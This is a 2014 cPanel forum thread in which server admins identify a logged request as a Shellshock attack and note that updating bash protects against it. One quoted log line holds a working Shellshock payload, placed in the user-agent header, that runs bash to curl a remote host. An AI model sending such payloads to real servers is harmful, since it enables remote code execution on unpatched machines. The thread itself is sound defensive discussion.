The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

requests with bash/curl in the browser signature

Discussion in 'Security' started by sehh, Dec 20, 2014.

  1. sehh

    sehh Well-Known Member

    Joined:
    Feb 11, 2006
    Messages:
    579
    Likes Received:
    5
    Trophy Points:
    18
    Location:
    Europe
    I see an increase in these types of attacks, requests with a bash execution of curl, which executes a remote piece of code.

    My question is, which application is vulnerable to this attack? something like a log reader, like "awstats"? There aren't many applications that read/parse/display server logs for browser signatures.

    Thank you!

    Code:
    176.102.38.77 - - [20/Dec/2014:20:30:43 +0000] "HEAD /cgi-bin/ HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c 'curl http://176.102.38.77/search/e.php?h=domain.com/cgi-bin/'"
    
    - - - Updated - - -

    Ah wait, that was just a simple shellshock attack... scratch that :)

    what kind of stupid admin executes bash from cgi-bin?... no wonder this bug did not affect my servers...
     
  2. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    30,678
    Likes Received:
    653
    Trophy Points:
    113
    cPanel Access Level:
    Root Administrator
  3. quizknows

    quizknows Well-Known Member

    Joined:
    Oct 20, 2009
    Messages:
    940
    Likes Received:
    55
    Trophy Points:
    28
    cPanel Access Level:
    DataCenter Provider
    You'd be surprised. Before bash was updated I saw a lot of boxes get hit, including cPanel stuff. It didn't necessarily have to be a bash script for it to work. They put the shellshock exploit code in every HTTP field you can think of (referrer, user agent, url, post data, etc).

    Anyway as long as your RPM updates run regularly and bash is up to date, nothing to see here. cPanel updates handle yum updates (RPM updates) for the most part anyway, so unless you're one of the fools who disables cPanel udpates entirely, you're fine.
     
Loading...

Share This Page